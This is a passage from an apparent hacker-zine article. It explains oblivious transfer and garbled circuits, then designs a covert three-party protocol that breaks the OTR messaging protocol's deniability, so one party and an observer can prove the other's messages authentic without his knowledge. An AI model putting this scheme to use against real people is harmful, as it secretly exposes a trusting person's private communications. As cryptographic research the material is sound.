Alice now sends the result z to Bob. Bob performs some computations:
|
|
|
|
(2.3.1) k0 = f^-1(z XOR r0)
|
|
(2.3.1) k1 = f^-1(z XOR r1)
|
|
|
|
One of the k values will be Alice's, but Bob doesn't know which one. The
|
|
other value will be junk, but it's important to note that this junk value
|
|
cannot be computed by Alice (she doesn't know f^-1). Now Bob simply does
|
|
the following:
|
|
|
|
A <---------- x0 XOR k0, x1 XOR k1 --------- B
|
|
|
|
Depending on which k value is the one that Alice actually knows, she can
|
|
decrypt x0 or x1. And that's it: Alice now knows the value she wanted to
|
|
receive and one junk value, which doesn't tell her anything. Bob however
|
|
doesn't know which of the k values was the one that Alice picked, so he he
|
|
cannot tell, which value Alice wanted to receive.
|
|
|
|
Let's try it out:
|
|
Say Bob hast two values x0 = 7 and x1 = 1. He is willing to share one with
|
|
Alice. First he generates f and f^-1. To do that, he just uses RSA. He
|
|
picks two prime numbers p = 5 and q = 11 and gets N = 55. Also, he picks
|
|
e = 3 as encryption exponent (don't do that at home, kids!). The
|
|
decryption exponent would then be d = 27 (you can compute that using the
|
|
euclidean algorithm or alternatively you could just believe us). Bob now
|
|
can send out (N, e) = (55, 3) to Alice, along with some random values
|
|
(r0, r1) = (4, 9).
|
|
|
|
Suppose Alice wants to retrieve the value of x1. First of all, she picks a
|
|
random k, let's say k = 6. She encrypts it using the public key Bob sent
|
|
(i.e. she applies Bob's one-way function): f(6) = 6^3 mod 55 = 51. She
|
|
computes z = f(k) + r1 = 51 + 9 mod 55 = 5, which she sends to Bob.
|
|
|
|
Bob now determines his candidates for k (i.e. k0 and k1) by computing:
|
|
k0 = f^-1(z - r0) = (5 - 4)^27 mod 55 = 1
|
|
k1 = f^-1(z - r1) = (5 - 9)^27 mod 55 = 6 <-- Alice's k, but Bob doesn't
|
|
know that
|
|
Bob then sends to Alice: x0 + k0 = 7 + 1 and x1 + k1 = 1 + 6.
|
|
|
|
Alice receives the two values 8 and 7. She knows that Bob's second value
|
|
was x1 + k. As she is interested in x1, she takes that value and computes
|
|
x1 = (x1 + k1) - k = 7 - 6 = 1 (observe that k = k1, which only Alice
|
|
knows). Now Alice could try to cheat and to also obtain x0. But to do that,
|
|
she would need to know the value that Bob computed for k0, which she won't
|
|
be able to compute without knowing f^-1 (i.e. the secret exponent d in our
|
|
case).
|
|
|
|
------[ 2.4 - Secure Function Evaluation
|
|
|
|
Secure function evaluation is another real gem of modern cryptography. A
|
|
classical example is the 0day problem. Two hackers A and B have a certain
|
|
number of 0day exploits each. They want to determine who is more elite, but
|
|
they are so paranoid that they don't even want the other to know how many
|
|
0days they have. So, A knows some number x, B knows y and both want to
|
|
compute the function f(x, y) = { 1 if x > y, -1 if y > x and 0 otherwise}.
|
|
Secure Function Evaluation solves this problem. Again, both parties
|
|
exchange a number of messages and after this is done, both of them know the
|
|
result of the function without having learned anything about the input of
|
|
the other party. And instead of the function shown above, they could just
|
|
arbitrarily agree on any function to be evaluated.
|
|
|
|
One interesting practical application of SFE is to perform mutual
|
|
authentication based on a shared secret. Two parties knowing a shared
|
|
secret can jointly compute the function
|
|
f(x, y) = {1 if x = y, 0 otherwise}. Interestingly, the OTR protocol makes
|
|
use of such a SFE scheme for authentication.
|
|
|
|
--------[ 2.4.1 More Voodoo
|
|
|
|
Suppose there is a function f(x, y), which two parties want to compute
|
|
(this is actually secure two-party computation, which is not the most
|
|
general case - for our purpose however it is sufficient). Both want to
|
|
share the result and both want to keep their own inputs safe. There are
|
|
several constructions that allow us to perform SFE. We'll discuss only one
|
|
of them here: Yao's garbled circuits [3]. As the name suggests, the
|
|
function to be evaluated by both parties first has to be transformed to a
|
|
boolean circuit. For many functions, this is generally not a problem. The
|
|
next step is to "garble" the circuit. The main idea behind this garbling
|
|
process is that we want everyone to be able to evaluate the circuit, while
|
|
nobody should see what he actually evaluates. Therefore, we will try to
|
|
hide all the bits that "flow" through the circuit. For hiding the bits, we
|
|
could make use of a block cipher. However, we have to take care that the
|
|
circuit can still be evaluated! Therefore, we will also have to modify all
|
|
the gates in the circuit somehow, so that they are able to work with
|
|
"garbled" inputs. Now one could imagine that such a modification is a hard
|
|
task. Fortunately, there's a simple trick: All the gates in our circuit are
|
|
very small boolean functions (by small we mean that they don't have many
|
|
inputs). We can therefore replace every gate by its truth table. The truth
|
|
table simply maps the input bits to the respective output bits. For a
|
|
simple NAND gate, the truth table would look like this:
|
|
|
|
\a|
|
|
b\| 1 0
|
|
--+----
|
|
1 | 0 1
|
|
0 | 1 1
|
|
|
|
Now that we have replaced every gate by its truth table, we will just have
|
|
to modify the truth tables, so that they reflect the fact that all the bit
|
|
values are garbled. The trick here is the following: Instead of the real
|
|
values of the input bits (1 or 0), we pick random cryptographic keys (say
|
|
128 bits long). We will then use those keys to encrypt the values in the
|
|
truth table. Instead of the input values for the gate, we will then use the
|
|
random keys (i.e. instead of 1 or 0, we just pick two random bitstrings per
|
|
wire).
|
|
|
|
As an example, consider a NAND gate again. We choose four keys ka0, ka1,
|
|
kb0 and kb1. Those are the keys for the respective input values of the gate
|
|
(i.e. a=0, a=1, b=0, b=1). Also, we pick an encryption function E and a
|
|
decryption function D. For simplicity, we assume that if a wrong key is
|
|
supplied to D, it will signal this (e.g. return an error code) instead of
|
|
providing a junk plaintext. We now perform the following transformation on
|
|
the truth table of our gate:
|
|
|
|
\a| \ a|
|
|
b\| 1 0 b \ | 1 0
|
|
--+----- -----> ---------+--------------------------------
|
|
1 | 0 1 1 | E_ka1(E_kb1(0)) E_ka0(E_kb1(1))
|
|
0 | 1 1 0 | E_ka1(E_kb0(1)) E_ka0(E_kb0(1))
|
|
|
|
The elements in the truth table are double encrypted using the two keys
|
|
that belong to the values of a or b, respectively. When evaluating the
|
|
circuit, you only know the keys that correspond to the correct input values
|
|
(so for example you know ka0 and kb1 but no other key). By simply trying to
|
|
decrypt every value in the table, it is easy to find the according output
|
|
value (only one decryption will succeed).
|
|
|
|
The next question would then be: How to garble a whole circuit? It's not
|
|
much different. Assume that two gates are connected like this:
|
|
|
|
Out
|
|
|
|
|
+------+
|
|
| G1 |
|
|
+------+
|
|
| |
|
|
+---+ In_3
|
|
|G2 |
|
|
+---+
|
|
| \
|
|
In_1 In_2
|
|
|
|
We have inputs In_1, In_2, In_3 and one output value Out. G2's output is
|
|
connected to one of the input wires of G1. In the truth table of G2, we
|
|
therefore put the *key* that corresponds to the respective input value of
|
|
G1 (so instead of double-encrypting G2's output value 1 or 0, we
|
|
double-encrypt the respective key for one of G1's input pins). The gate G1
|
|
can be garbled as described above. The keys for the input wires In_1, In_2
|
|
and In_3 are assumed to be already known by the party evaluating the
|
|
circuit. G2 can now easily be evaluated and yields the missing key for
|
|
evaluating the gate G1. However, during the evaluation of the circuit, no
|
|
intermediate values (like the real output of G2) are disclosed to the
|
|
evaluating party.
|
|
|
|
Let's try that in practice:
|
|
Say Alice and Bob want to evaluate a function. The following protocol can
|
|
be used: A prepares a garbled circuit and hard-codes her input values into
|
|
the circuit. She sends the result to B. B now needs to retrieve the keys
|
|
for his input values from A. But beware of two limitations here:
|
|
1) B doesn't want to disclose his input values to A (obviously).
|
|
2) A doesn't want to tell B the keys for both input values, because
|
|
then B would be able to reverse-engineer the circuit and to obtain
|
|
A's input values.
|
|
You've probably already seen the solution: B uses an oblivious transfer to
|
|
obtain the keys for his input values from A. For every bit b of his input
|
|
values, Bob will obliviously obtain the correct key k_b0 or k_b1 like this:
|
|
|
|
A ---------------- f, r0, r1 --------------> B
|
|
A <------------- z = f(k) XOR rb ----------- B
|
|
A -------- k_b0 XOR k0, k_b1 XOR k1 -------> B
|
|
|
|
B is now able to evaluate the whole circuit. Depending on how A built the
|
|
circuit, the output truth tables could contain real or garbled values.
|
|
Using some simple tricks, we can even split the output between A and B (so
|
|
that A gets some part of the result and B gets another part). We'll detail
|
|
on that later. Now there are some problems when one party isn't honest.
|
|
Alice for instance could just prepare a malicious circuit that leaks
|
|
information about Bob's secret inputs. There are ways to prevent such
|
|
attacks ("cut and choose", zero knowledge proofs, etc), but we won't
|
|
provide the details here. A more detailed description (along with a
|
|
security proof) can be found in [3].
|
|
|
|
--[ 3 - OTR
|
|
|
|
For those who are not familiar with the OTR protocol, this section might
|
|
provide some help. OTR features a number of cryptographic properties,
|
|
including confidentiality, integrity, forward secrecy and deniability.
|
|
There are two major phases of the protocol: initial key exchange and
|
|
message exchange. The initial key exchange is based on the Diffie-Hellman
|
|
protocol. It is referred to as AKE (Authenticated Key Exchange). To defend
|
|
against active attackers, a public-key signature scheme (DSA in this
|
|
particular case) is used. The DSA master keys have to be exchanged
|
|
beforehand (OTR also offers to authenticate DSA keys using the SMP
|
|
protocol, but that's not interesting in our case).
|
|
|
|
All the cryptographic details are provided in [2]; it's not particularly
|
|
helpful to repeat them here. Keeping in mind that OTR's key exchange is
|
|
based on Diffie-Hellman combined with some symmetric crypto and a signature
|
|
scheme will suffice. After the key-exchange phase, each party will have a
|
|
number of symmetric keys for encryption and authentication. Those are
|
|
derived from the Diffie-Hellman master key by hashing it in various ways
|
|
(encryption and MAC key will obviously be different).
|
|
|
|
The messages are encrypted using AES in CTR mode, and each message is MACed
|
|
using the symmetric key material. That offers us confidentiality and
|
|
integrity. It's important to note that *only* symmetric keys are used for
|
|
the actual payload crypto. The DSA master keys are only used in the initial
|
|
key-exchange phase.
|
|
|
|
The next feature we're going to look at is forward secrecy. Forward secrecy
|
|
means that even if the (DSA) key of a participant is disclosed, past
|
|
conversations cannot be compromised. Forward secrecy in OTR is established
|
|
by the Diffie-Hellman protocol: after a conversation ends, both parties can
|
|
safely wipe the Diffie-Hellman key that they generated. There is no way for
|
|
an attacker (and not even for the conversation partners) to re-compute that
|
|
key afterwards: to do that, one would either need to know the private
|
|
exponent of one party (which is of course also wiped from memory) or one
|
|
would need to derive the key from the public information exchanged between
|
|
both parties, which is infeasible (hopefully; that's what Diffie-Hellman
|
|
relies on in the first place).
|
|
|
|
Having understood how OTR provides forward secrecy, we can move on to
|
|
deniability. During the conversation, both parties can be sure that the
|
|
messages they receive are authentic and not modified by an attacker. It is
|
|
immediately clear that the message authenticity can not be verified without
|
|
the MAC key. If one of the conversation partners wants to convince a third
|
|
party that a message is authentic, this conversation partner implicitly
|
|
proofs his knowledge of the MAC key to the third party. But then again, the
|
|
third party can not be sure that the conversation partner didn't fake the
|
|
message (he can do this as he knows the MAC key). This is what we call weak
|
|
deniability [4]. Obviously, OTR offers weak deniability, as message
|
|
authentication is performed using only symmetric primitives. But OTR offers
|
|
even more: In every message, the sending party includes a new
|
|
Diffie-Hellman key exchange proposal. The proposal is also covered by the
|
|
MAC to rule out MITM attacks. So both parties frequently generate new key
|
|
material. And this lets us do a nice trick: as soon as they generate new
|
|
MAC keys they publicly disclose the old MAC keys. The old keys aren't used
|
|
anymore, so this is safe. But as the MAC keys are public, *everybody* could
|
|
create fake messages and compute proper MACs for those. This is what we
|
|
call strong deniability. OTR ships with a toolkit containing software for
|
|
actually forging messages. Depending on how much you already know (only the
|
|
MAC keys, MAC and encryption keys, MAC keys and some message plaintext),
|
|
you can use different tools to forge messages. If you know parts of the
|
|
plaintext and the MAC keys, you can exploit the fact that AES is used in
|
|
CTR mode to directly modify the known parts of the plaintext. If there is
|
|
no known plaintext, the otr_remac tool might helpful: Every message
|
|
contains a new Diffie-Hellman key exchange proposal in plaintext (but
|
|
covered by the MAC). Now you can simply replace that proposal by one that
|
|
you generated (e.g. using the otr_sesskeys tool) and compute a new MAC for
|
|
the packet. That allows you to easily fake the rest of the conversation:
|
|
You know your own private Diffie-Hellman key, so you can generate a
|
|
plausible set of MAC and encryption keys and just use that one. It will
|
|
look legitimate because the modified packet (containing your key exchange
|
|
data) still has a valid MAC.
|
|
|
|
--[ 4 - The Attack
|
|
|
|
The deniability of OTR stems from the fact that a third party does not know
|
|
whether a message has been sent during a conversation (and before the MAC
|
|
keys were disclosed) or was generated afterwards (when the MAC keys were
|
|
public). An obvious way to attack OTR's deniability would therefore be to
|
|
just monitor all the OTR traffic between A and B. If one party now decides
|
|
to disclose the MAC and encryption keys used for a particular message, the
|
|
authenticity of that message can be verified. And as the message has been
|
|
recorded during the conversation (i.e. before the MAC keys were public),
|
|
the recording party knows that it was not generated afterwards.
|
|
|
|
Let's look at a real-life example to shed some more light on what we're
|
|
doing. Imagine two hackers A and B who want to talk about serious stuff
|
|
(TM) using OTR. Both of them are slightly paranoid and don't trust each
|
|
other. In particular, Bob fears that Alice might backstab him. However, as
|
|
OTR is deniable, Bob assumes that even if Alice discloses the contents of
|
|
their conversation, he could still plausibly argue that Alice just made it
|
|
up to discredit him. So Bob ignores his paranoia and tells Alice his
|
|
secrets. Alice indeed plans to backstab Bob. Her first plan is simple: She
|
|
will just submit all the encrypted and authenticated messages to the
|
|
police. The police will later be able to state in court that Alice didn't
|
|
fake the messages after the conversation. She however quickly realizes that
|
|
this approach is inherently flawed: Bob could argue that Alice just sent
|
|
fake messages to the police (as Alice knows all the keys she could generate
|
|
such fake messages). Alice knows that this problem could be fixed if the
|
|
Police sniffed all the traffic themselves. But she also knows that this is
|
|
going to be difficult, so she comes up with a second idea: Why not use a
|
|
trusted third party?
|
|
|
|
Instead of submitting her messages to the police, she will just disclose
|
|
her private DSA key to her lawyer. Then, during her conversation with Bob,
|
|
she will use her lawyer as a proxy (i.e. she will let *him* do the
|
|
crypto). This way the lawyer can be sure that the conversation is
|
|
authentic. The judges will trust Alice's lawyer in court (at least they'll
|
|
trust him more than they trust Alice), so her problem is solved. Alice's
|
|
setup would look like this:
|
|
|
|
+-------+
|
|
| Alice |
|
|
+-------+
|
|
^
|
|
| Non-OTR (maybe SSL)
|
|
v
|
|
+------------+
|
|
| Lawyer | trust +----------------+
|
|
| Speaks for | <---------> | Police / Court |
|
|
| Alice | +----------------+
|
|
+------------+
|
|
^
|
|
| OTR (Bob thinks he talks to Alice)
|
|
v
|
|
+-------+
|
|
| Bob |
|
|
+-------+
|
|
|
|
But now Alice realizes that she doesn't trust her lawyer enough to give him
|
|
her private DSA key: He could misuse it to impersonate her. Also, Alice
|
|
doubts that her lawyer's words would be trusted enough in court.
|
|
|
|
This example shows the problems that Alice has when she wants to break the
|
|
deniability of OTR. Her problems can be summarized as follows (we'll now
|
|
call the police the "observing party" and the lawyer will be called
|
|
"trusted third party"):
|
|
a) The observing party needs to sniff the network traffic. That implies
|
|
quite a privileged network position, as the traffic needs to be sniffed
|
|
passively, i.e. without the help of A or B. Because if A or B would
|
|
send their traffic to the observing party, A or B might just insert
|
|
bogus messages into their "sniff" stream and the observing party
|
|
couldn't be sure about the authenticity. Even worse, paranoid A and B
|
|
could use an anonymizing network, so that sniffing their traffic would
|
|
be a non-trivial task.
|
|
|
|
b) Also, the authenticity of a message can only be proven to the observing
|
|
party, but not to anybody else (as anybody else didn't sniff the traffic
|
|
and the observing party could just have cut some pieces or inserted new
|
|
ones).
|
|
|
|
Problem b) is not that much of importance. Just imagine the observing party
|
|
as the police, the judges or even Fnord. You should always assume that the
|
|
observing party is exactly the guys you wanna protect yourself against. If
|
|
you think that the police probably won't even get all the crypto stuff and
|
|
therefore just believe any plaintext logfile you show them, that's OK
|
|
(you're probably right). There might however be agencies that would not
|
|
really trust plaintext logs. And those agencies might be very interested in
|
|
the contents of some OTR conversations.
|
|
|
|
Problem a) remains open. Obviously, neither A nor B really trust the
|
|
observing party. If we had a trusted third party, we actually could mount
|
|
an attack against OTR's deniability, just as described in the lawyer
|
|
example above. Well, lucky us, neither A, nor B, nor the observing party
|
|
trust anybody and therefore, there will be no trusted third party ;)
|
|
|
|
Really? Interestingly, a trusted third party can be emulated using secure
|
|
function evaluation. This is what we didn't tell in the section above: You
|
|
can view a secure function evaluation scheme as a replacement for a trusted
|
|
third party. So instead of letting a third party compute some function
|
|
f(x, y), A and B can perform the computation on their own and still get the
|
|
same result: both players only receive f(x, y) but A doesn't see y and B
|
|
doesn't see x. So the main idea of our attack is: Emulate a trusted third
|
|
party using secure function evaluation. The setup that Alice now plans is
|
|
the following:
|
|
|
|
+-------+
|
|
| Alice |<-----------+
|
|
+-------+ |
|
|
^ |
|
|
| | SFE Voodoo for emulating the lawyer
|
|
| |
|
|
| v
|
|
| +----------------+
|
|
| | Police / Court |
|
|
| +----------------+
|
|
|
|
|
| OTR
|
|
|
|
|
v
|
|
+-------+
|
|
| Bob |
|
|
+-------+
|
|
|
|
Our central idea is the following: A can send all the messages she received
|
|
from B to the observing party (the police in the figure above, but that
|
|
could really be everyone). The messages are still encrypted, so this is not
|
|
a problem. To make sure that the messages are not faked by A, we need to
|
|
make sure that A cannot produce valid MACs without the help of the
|
|
observing party. We therefore share the MAC key between A and the observing
|
|
party. Every time, A wants to validate or produce a MAC, she has to
|
|
cooperate with the observing party. Later on, A can reveal the encryption
|
|
key for any message to the observing party, which can be sure that the
|
|
message is authentic.
|
|
|
|
In the following section (4.1 - 4.3), we will provide a high-level overview
|
|
of the attack. In section 4.4, you can find the actual protocol that Alice
|
|
and the observing party use.
|
|
|
|
------[ 4.1 - Sharing Diffie-Hellman Keys
|
|
|
|
OTR uses Diffie-Hellman to establish sort-lived MAC and encryption keys.
|
|
The first part of our exercise is therefore to build a Diffie-Hellman
|
|
compatible 3-party protocol that allows for sharing the generated key
|
|
between two parties. The following protocol between Alice (A), Bob (B)
|
|
and the observing party (O) works:
|
|
|
|
O ----- g^o ----> A ---- (g^o)^a ----> B
|
|
O <---- g^a ---- A
|
|
A <--- g^b ---- B
|
|
|
|
All computations are done modulo some prime p and g is a generator of a
|
|
sufficiently large subgroup of Z_p*, just as Diffie-Hellman mandates.
|
|
B will now compute g^oab as key. However, neither A nor O can reproduce
|
|
that key. If A wanted to compute it, she would need to know O's secret
|
|
exponent o. Similar for O. We can therefore say that the key k is shared
|
|
between O and A, in the sense that A and O need to cooperate in order to
|
|
actually use it.
|
|
|
|
------[ 4.2 - Generating MAC and Encryption Keys
|
|
|
|
Now that we have established a shared Diffie-Hellman key, we need to
|
|
securely derive the MAC and encryption keys from it. Let's assume we have a
|
|
circuit C, which takes the shared Diffie-Hellman key k as input and returns
|
|
the corresponding MAC and encryption keys as output. This circuit follows
|
|
immediately from the OTR specification. Before we can evaluate the circuit,
|
|
we first need to compute k (which neither A nor O know at this time). So
|
|
the overall function that A and O want to compute is:
|
|
|
|
f(a, o) = C(((g^b)^a)^o mod p)
|
|
|
|
We can transform this function to a new circuit and evaluate it together
|
|
(i.e. A and O evaluate the circuit). After the evaluation, A could get the
|
|
encryption keys. But that's not a good idea, because the OTR spec mandates
|
|
that MAC_key = hash(encryption_key). If A knew the encryption key, she
|
|
could compute the according MAC key. Also, it would be bad if O would get
|
|
the MAC keys, because then O could impersonate A and B. Therefore, we'll
|
|
slightly modify the circuit, so that A may pick a random bit string, which
|
|
the circuit XORs to the MAC key and to the encryption key (assuming the
|
|
random string is long enough for both keys). The "blinded" MAC and
|
|
encryption keys are then provided to A and O, the bitmask remains in A's
|
|
memory. If they want to use one of the keys for something, they will
|
|
evaluate a circuit that first XORs both halves together and then does the
|
|
actual computation using the key. At no point in time, A or O actually
|
|
learn the MAC or the encryption key.
|
|
|
|
Now that we know how to generate all the symmetric key material, we are
|
|
able to perform the full initial key exchange phase of OTR.
|
|
|
|
------[ 4.3 - Sending and Receiving Messages
|
|
|
|
When A receives a message from B, she cannot immediately decrypt it because
|
|
she doesn't know the decryption key. Also, verifying and sending messages
|
|
needs O's cooperation.
|
|
|
|
1) Message Decryption
|
|
If A wants to decrypt one of B's messages, she cooperates with O. Both
|
|
parties will jointly evaluate a decryption circuit. The circuit will be
|
|
built in such a way that only Alice will learn the result (i.e. Alice
|
|
will again provide a random bitstring as input the the circuit, which is
|
|
XORed to the result).
|
|
|
|
2) Message Verification
|
|
If A wants to verify one of B's messages, she has to cooperate with O.
|
|
A and O will jointly evaluate some sort of HMAC circuit, in order to
|
|
find out whether a message is authentic or not. We can design the
|
|
message verification function in such a way that O will immediately
|
|
learn the encrypted message and the MAC verification result. This
|
|
enables A to afterwards reveal the encryption key for a particular
|
|
message, so that O will be convinced A didn't fake it.
|
|
|
|
3) Message Creation
|
|
When A wants to create a message, she encrypts it together with O, just
|
|
as described in 1). In order to compute a MAC for the message, A and O
|
|
again cooperate. As each message has to contain a new Diffie-Hellman
|
|
public key, A and O will jointly compute such a key using the scheme
|
|
outlined above.
|
|
|
|
------[ 4.4 - The Final Protocol
|
|
|
|
In this section we'll describe our final protocol. It offers the following
|
|
features:
|
|
* We have three parties: A, B and O. A and O cooperate to backstab B. B is
|
|
not able to deny any of his messages towards O.
|
|
* O will not learn any message plaintext, unless A explicitly tells O the
|
|
respective keys.
|
|
* O is not able to impersonate neither A nor B.
|
|
* No trust relation between A and O is required.
|
|
* A does not have to disclose a whole conversation to O; it is possible to
|
|
only disclose selected messages.
|
|
* B does not notice that A and O cooperate.
|
|
|
|
---------[ 4.4.1 - Initial Key-Exchange
|
|
|
|
This section describes OTR's authenticated key-exchange (AKE).
|
|
Bob starts the key exchange by picking a random r and x and sending
|
|
AES_r(g^x), HASH(g^x) to Alice. That's the regular OTR protocol. Alice
|
|
then does a Diffie-Hellman key-exchange with O as outlined in section
|
|
4.1. We assume that A and O communicate over a secure channel.
|
|
|
|
O A <-------- AES_r(g^x), HASH(g^x) ----- B
|
|
O <------- g^a ------------- A
|
|
O -------- g^o ------------> A
|
|
|
|
Now Alice sends her Diffie-Hellman public key to Bob. Note that she doesn't
|
|
know the private exponent of the key: she knows only a and g^ao, but
|
|
neither ao nor o.
|
|
|
|
A ------------------ g^ao ------------> B
|
|
|
|
Bob has already computed the common key k (which Alice can't do) and uses
|
|
it to derive encryption keys c and c' and MAC keys m1, m1', m2, m2' (see
|
|
the OTR specs [2] for details) by hashing k in various ways. Bob builds
|
|
the following messages:
|
|
|
|
M_B = MAC_m1(g^x, g^ao, pub_B, keyid_B)
|
|
X_B = pub_B, keyid_B, sig_B(M_B)
|
|
|
|
Where pub_B is Bob's public DSA key and keyid_B is an identifier for Bob's
|
|
Diffie-Hellman proposal g^x. sig_B is created using Bob's DSA key. Using
|
|
the already derived symmetric keys, he sends AES_c(X_B),MAC_m2(AES_c(X_B))
|
|
over to Alice.
|
|
|
|
A <- r, AES_c(X_B),MAC_m2(AES_c(X_B)) - B
|
|
|
|
Alice is now supposed to also derive all the symmetric keys
|
|
and to use them to decrypt and verify the stuff that Bob sent. But Alice
|
|
cannot do that, so she cooperates with O. O sends her a garbled circuit C1,
|
|
which will compute
|
|
|
|
C1(o, a, mask) = (c, c') XOR mask
|
|
|
|
Alice randomly chooses mask, so only she will learn c and c'. In a number
|
|
of oblivious transfers, Alice receives the keys for her input values from
|
|
O.
|
|
|
|
O --------- C1 ------------> A\
|
|
\
|
|
O -------- <OT> -----------> A \
|
|
O <------- <OT> ------------ A |
|
|
O -------- <OT> -----------> A | Compute c, c' using SFE. Only A
|
|
. | receives the values.
|
|
. |
|
|
. /
|
|
O <----- eval(C1) ---------- A /
|
|
O --- (c,c') XOR mask -----> A/
|
|
|
|
Now Alice is finally able to decrypt the stuff that Bob sent her. She does
|
|
so and gets X_B. Currently, she is not able to verify the MAC_m2() value
|
|
Bob sent - she'll do that later. First she sends sig_B(M_B) over to O.
|
|
|
|
O <------- sig_B(M_B) ------ A
|
|
|
|
In order to actually verify sig_B(M_B), A and O first need to compute M_B.
|
|
As described above, M_B = MAC_m1(g^x, g^ao, pub_B, keyid_B). In order to
|
|
compute that MAC, both parties again need to cooperate. O creates a circuit
|
|
C2, which computes:
|
|
|
|
C2(o, a, pub_B, keyid_B) = MAC_m1(g^x, g^ao, pub_B, keyid_B)
|
|
|
|
Alice again uses oblivious transfers to obtain the keys for her secret
|
|
input value a, evaluates the circuit and both parties obtain the result
|
|
M_B.
|
|
|
|
O --------- C2 --------------> A\
|
|
\
|
|
O -------- <OT> -------------> A \
|
|
O <------- <OT> -------------- A |
|
|
O -------- <OT> -------------> A | Compute M_B using SFE. A and O
|
|
. | receive the value.
|
|
. |
|
|
. /
|
|
O <----- eval(C2) ------------ A /
|
|
O -------- M_B --------------> A/
|
|
|
|
Now that both have computed M_B, they first check the signature sig_B(M_B),
|
|
just as the OTR protocol mandates. If A and O are convinced that sig_B(M_B)
|
|
is OK, they can verify the MAC_m2(...) that B sent earlier. Again, they
|
|
perform some SFE voodoo to do that. The observing party prepares a circuit
|
|
C3, which computes:
|
|
|
|
C3(o, a, AES_c(X_B)) = MAC_m2'(AES_c(X_B))
|
|
|
|
A again uses oblivious transfers to obtain the keys for her input values
|
|
and the result is shared between both parties.
|
|
|
|
O --------- C3 --------------> A\
|
|
\
|
|
O -------- <OT> -------------> A \
|
|
O <------- <OT> -------------- A |
|
|
O -------- <OT> -------------> A | Compute MAC_m2'(AES_c(X_B)) using
|
|
. | SFE. Both receive the result.
|
|
. |
|
|
. /
|
|
O <----- eval(C3) ------------ A /
|
|
O --------- MAC -------------> A/
|
|
|
|
Now A and O are convinced that the key exchange with B succeeded. But they
|
|
still need to convince B that everything is OK. In particular, OTR mandates
|
|
that A should compute
|
|
|
|
M_A = MAC_m1'(g^ao, g^x, pub_A, keyid_A)
|
|
X_A = pub_A, keyid_A, sig_A(M_A)
|
|
|
|
and then send AES_c'(X_A), MAC_m2'(AES_c'(X_A)) over to B. Computing the
|
|
AES part can be done by A, because A knows the key c'. But for computing
|
|
the MAC, A and O again need to cooperate. First, A sends AES_c'(X_A) over
|
|
to O. Then O prepares a circuit C4, which computes:
|
|
|
|
C4(o, a, AES_c'(X_A)) = MAC_m2'(AES_c'(X_A))
|
|
|
|
Using oblivious transfers, Alice obtains the keys for her inputs from O.
|
|
After evaluating the circuit, A and O obtain MAC_m2'(AES_c'(X_A)).
|
|
|
|
O <----- AES_c'(X_A) -------- A\
|
|
O --------- C4 --------------> A \
|
|
\
|
|
O -------- <OT> -------------> A |
|
|
O <------- <OT> -------------- A | Compute MAC_m2'(AES_c'(X_A)). Both
|
|
O -------- <OT> -------------> A | parties receive the value.
|
|
. |
|
|
. /
|
|
O <----- eval(C4) ------------ A /
|
|
O -- MAC_m2'(AES_c'(X_A)) ---> A/
|
|
|
|
That's it. A can now send all the required values to B.
|
|
|
|
- AES_c'(X_A), MAC_m2'(AES_c'(X_A)) -> B
|
|
|
|
B verifies all the stuff (just like A did but without the SFE) and the
|
|
key exchange is done.
|
|
|
|
---------[ 4.4.2 - Message Exchange
|
|
|
|
Once they have exchanged their initial key material, Alice and Bob can
|
|
exchange actual messages. Suppose, Alice wants to send a message to Bob;
|
|
we'll restrict ourselves to that scenario. Receiving messages works
|
|
similar.
|
|
|
|
Alice now does the following (from the OTR protocol spec [2]):
|
|
Picks the most recent of her own Diffie-Hellman encryption keys that Bob
|
|
has acknowledged receiving (by using it in a Data Message, or failing
|
|
that, in the AKE). Let key_A be that key, and let keyid_A be its serial
|
|
number.
|
|
|
|
If the above key is Alice's most recent key, she generates a new
|
|
Diffie-Hellman key (next_dh), to get the serial number keyid_A+1.
|
|
|
|
To do this, Alice again needs to cooperate with the observing party.
|
|
The steps are exactly the same as we have already seen in the initial
|
|
key-exchange:
|
|
|
|
O <------- g^a -------------- A
|
|
O -------- g^o -------------> A
|
|
|
|
Alice now uses g^ao as next_dh. When she computed next_dh, Alice
|
|
picks the most recent of Bob's Diffie-Hellman encryption keys that she has
|
|
received from him (either in a Data Message or in the AKE). Let key_B be
|
|
that key, and let keyid_B be its serial number.
|
|
|
|
Now Alice would actually need to use Diffie-Hellman to compute a fresh
|
|
shared key with Bob, which she can use to derive the encryption and MAC
|
|
key. But as she doesn't really know the private exponent (she knows g^ao,
|
|
a and g^a, but not ao), she again needs to cooperate with O. So here we go:
|
|
|
|
O prepares a circuit C1:
|
|
|
|
C1(o, a, mask) = (ek, mk) XOR mask
|
|
|
|
The circuit will compute both, ek and mk (the encryption and MAC keys),
|
|
blinded with some value chosen by Alice. The result will be supplied only
|
|
to the observing party. Alice will keep the value of mask. In a number of
|
|
oblivious transfers, Alice receives the keys for her input values from O.
|
|
|
|
O --------- C1 ------------> A\
|
|
\
|
|
O -------- <OT> -----------> A \
|
|
O <------- <OT> ------------ A |
|
|
O -------- <OT> -----------> A | Compute (ek, mk) XOR mask using SFE.
|
|
. | Only O receives the result.
|
|
. |
|
|
. /
|
|
O <----- eval(C1) ---------- A /
|
|
|
|
Alice now picks a value ctr, so that (key_A, key_B, ctr) is unique. The
|
|
ctr value is needed, because AES is going to be used in counter mode to
|
|
encrypt Alice's payload. The next step for Alice is to encrypt her message.
|
|
As she doesn't know the encryption key, O prepares a circuit C2 for her:
|
|
|
|
C2(ek_o, ek_a, ctr, msg) = AES-CTR_ek,ctr(msg)
|
|
|
|
The inputs ek_o and ek_a denote O's and A's knowledge about ek, which is
|
|
ek XOR mask in O's case and mask in A's case. The result of the circuit
|
|
will only be provided to A (i.e. A just doesn't send it over to O). In a
|
|
number of oblivious transfers, Alice receives the keys for her input
|
|
values from O.
|
|
|
|
O --------- C2 ------------> A\
|
|
\
|
|
O -------- <OT> -----------> A \
|
|
O <------- <OT> ------------ A |
|
|
O -------- <OT> -----------> A | Encrypt msg using SFE. Only A
|
|
. | receives the result.
|
|
. /
|
|
. /
|
|
|
|
Now Alice can compute:
|
|
|
|
T_A = (keyid_A, keyid_B, next_dh, ctr, AES-CTR_ek,ctr(msg))
|
|
|
|
T_A already contains Alice's message, but she still needs to MAC it. This
|
|
is again done by A and O together. O prepares a circuit C3:
|
|
|
|
C3(mk_o, mk_a, T_A) = MAC_mk(T_A)
|
|
|
|
O --------- C3 --------------> A\
|
|
\
|
|
O -------- <OT> -------------> A \
|
|
O <------- <OT> -------------- A | Compute MAC_mk(T_A). Both
|
|
O -------- <OT> -------------> A | parties receive the value.
|
|
. |
|
|
